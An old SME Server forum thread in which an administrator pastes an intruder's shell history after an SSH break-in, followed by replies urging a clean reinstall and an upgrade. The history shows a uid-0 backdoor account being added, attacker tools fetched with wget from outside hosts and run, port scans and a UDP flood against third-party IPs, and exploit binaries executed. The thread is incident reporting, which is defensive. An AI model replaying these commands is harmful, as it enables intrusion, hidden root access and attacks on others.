Koozali.org: home of the SME Server
Contribs.org Forums => General Discussion => Topic started by: mindea on March 22, 2007, 05:23:49 PM
-
It looks like my server security was breached. I think due to a lazy password for an SSH login. But once in, I don't know how they managed to change the admin password, which was very secure. The root password was not changed. I'm curious as to what they were up to. Below is some of the command history.
$ /usr/sbin/useradd -u -0 -o -g -0 gepe
later, this appears
42 lynx www.cservice.undernet.org/live
43 w
44 ps x
45 cd .gepe
46 mkdir .gepe
47 cd .gepe
48 wget bnc-irc.trei.ro/linux/psybnc.tar.gz
49 tar xzvf psybnc.tar.gz
50 cd psybnc
51 make
52 cd -
53 wget http://whynot.saveitfree.com/linux.tgz
54 w
55 cd .gepe
56 ls
57 wget http://iasi-hack.sufx.net/strobe.zip
58 tar xzvf strobe.zip
59 cd strobe
60 ./strobe 85.204.247.250
61 ./strobe 89.108.81.36
62 ./strobe 194.84.153.50
63 ./strobe 195.199.197.243
64 ./strobe 81.183.216.57
65 w
66 ps x
67 cd .gepe
68 ls
69 cd psybnc
70 ./psybnc
71 ls
72 make
73 cd -
74 wget http://whynot.saveitfree.com/linux.tgz
75 tar xzvf linux.tgz
76 cd vlad/
77 ./bash
78 cd .gepe
79 cd strobe
80 ./strobe 217.10.221.145
81 w
82 ls
83 cd .gepe
84 ls
85 cd strobe
86 ./strobe 217.10.195.146
87 ./strobe 217.10.199.254
88 w
89 ls
90 cd .gepe
91 ls
92 wget http://cutitas.uv.ro/udp.tgz
93 tar xzvf udp.tgz
94 perl udp.pl 80.17.241.75 0 0
95 cd .gepe
96 ls
97 cd eplo
98 cd exploituri/
99 ./p
100 ls
101 ./p
102 ./I
103 id
104 ls
105 cd -
106 ls
107 cd
108 ls
109 cd .gepe
110 uname -a
111 wget help-bnc.octopis.com/do.tgz
112 tar xzvf do.tgz
113 ls
114 ./do
Then I looked in the mail directory. There is no entry for "gepe", but the root entry looked like this:
-rw-rw---- 1 root root 0 Mar 22 02:19 gepe
I have now set my hardware firewall (Sonicwall) to not allow any inbound or outbound traffic from the server. I'd like to avoid having to reinstall if I can figure out how to undo/disable whatever they may have installed. Plus, I'll reset all the passwords to a higher lever and put very strict port rules on the firewall.
Any comments would be greatly appreciated. (The server is SME 6.01)
Thanks!
-
ANY COMMENT(s)...
Ehmm.. what about upgrading ? and since you are suffering from a hack I would suggest a clean install.
I have been somewhere in 2005 busy with some patches for the 6.x because there were a lot of uncertain safety issues. I guess u missed that.
Evn tho I had all patches they managed to breach the security of 1 server unde rmy control by using a backdoor in awstats. No matter what you do. Don't rely on safety too easy. Keeping things updated is the best you can do and praying that they are not interested in trying to get in your server because we might be called experts by the people around us. There is always a "better" person.
Learn from it and move on to higher grounds (SME 7)
my 2 cents
Harro
-
Now you know why you should upgrade your server to 7.1. Didn't you read the forum posts. SME 6 is not maintained anymore and you can thank yourself if you get hacked.
I would suggest that you format your server and install 7.1.2 with the latest updates+implement a ssh with public/private keys or disable it if you don't need it.
Don't bother with removing what they did. Install the newest SME version and patches and you're set. If you just fix what they did they can hack you again like they did. Having an obsolete server is never a god idea.
-
Please do NOT report security breaches on the forum. Please read before you post and you would have seen...
"Don't report security issues here - Contact security at contribs dot org"
I know this is SME Server 6 and obsolete but as a general rule please never report a security breach on a public forum.
-
Let me be the 2nd to say backup any important data and reload but not for the same reason given previously.
I say reload because even though you can see logs of what he did you still can never be certain that he did not remove any log files. So even if you simply remove what you see he did your machine thier could still be other files the can allow him to reenter your machine. He could have simply removed/truncated the log so you could only see what he wanted you to see so cut you losses and reload.
If possible you might as well take the opportunity to upgrade to the lastest version. I just have a drive problem with my 6.1 server a few days ago and in a week or 2 after I decide on what hard drive/storage options I will be upgrading to 7.1.
For people who simply see someone with an old non supported version of the software and say that he needs to upgrade .. if you dont work in the IT field then you probaly dont realize that its not always that easy. While as stated knowing of the security risks it is the admins own fault he got hacked sometimes one can lose functionality when upgrading so people will wait before upgrading. This is the reason I normally stay a version behind to give the sme community time to get some of the custom contribs I like to have working with the latest version. A company a friend works for recently decided at the last minute not to perform an software upgrade because the new version did not include some of the same features the old software has that his company uses.
Last but not least his hardware might not be capable of supporting the latest version or might run like crap as I recently found when I had to replace my production system with my slower test system. Version 7.2 really kicks the crap out of a 600 mhz with 128 mb ram when in the past this system worked great for what I needed.
-
Sme 7 is at 7.1.3 version so this is not just one version behind but at least 3-4 versions and is not a good thing to do. Yes there can be problems but i always update when people don't need the server (at night 01:00) and it does the trick.
Not to mention that opening SSH without custom certificates if always a bad idea.